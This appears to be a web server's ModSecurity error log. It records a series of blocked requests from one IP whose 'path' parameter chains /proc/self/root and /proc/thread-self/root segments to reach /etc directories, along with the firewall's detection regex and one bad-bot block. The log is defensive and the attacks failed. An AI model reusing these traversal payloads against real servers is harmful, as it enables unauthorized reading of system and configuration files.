[Mon Mar 16 10:24:18.416842 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:54254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEgdSswJuvopo3lOhStgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:24:19.743334 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:54270] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEg7ABkC4fWIHEf8Hd1wAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:24:21.071739 2026] [:error] [pid 32654:tid 140411632822016] [client 74.7.243.203:56430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEhQlT9VtDQc7bgUye9gAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:24:23.410411 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:56442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEhxXjF1vJNtV6CWrsIQAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:24:27.991309 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:56454] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEiwlT9VtDQc7bgUye-gAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:24:32.363296 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:56462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEkLABkC4fWIHEf8Hd3AAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:24:44.044776 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:44246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEnP9ocpUE4ed4uDzf4AAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:24:46.273110 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:39478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEnhXjF1vJNtV6CWrsJgAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:24:47.591956 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:39480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEnxXjF1vJNtV6CWrsJwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:25:09.585380 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:39486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEtZqj1wV0Si-OkefcCwAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:25:10.890326 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:49052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEtrABkC4fWIHEf8Hd4gAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:25:16.644168 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:49060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEvLysWC90G-1nBrA3-gAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:25:17.947376 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:49062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgEvdSswJuvopo3lOhSvwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:25:54.906892 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.228.16:53910] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgE4hXjF1vJNtV6CWrsNAAAAc4"]
[Mon Mar 16 10:26:18.670373 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:49076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgE-pqj1wV0Si-OkefcgAAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:26:22.138889 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:47226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgE_tSswJuvopo3lOhSygAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:26:24.470993 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:48976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFALABkC4fWIHEf8Hd7QAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:26:25.744236 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:48990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFAY6lpbStxTqkSktgkQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:26:26.887624 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.243.203:48996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFAhXjF1vJNtV6CWrsNgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:26:34.659798 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:49008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFCv9ocpUE4ed4uDzgAAAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:26:40.847126 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:42778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFEP9ocpUE4ed4uDzgCQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:26:48.670621 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:33178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgFGNSswJuvopo3lOhS1QAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
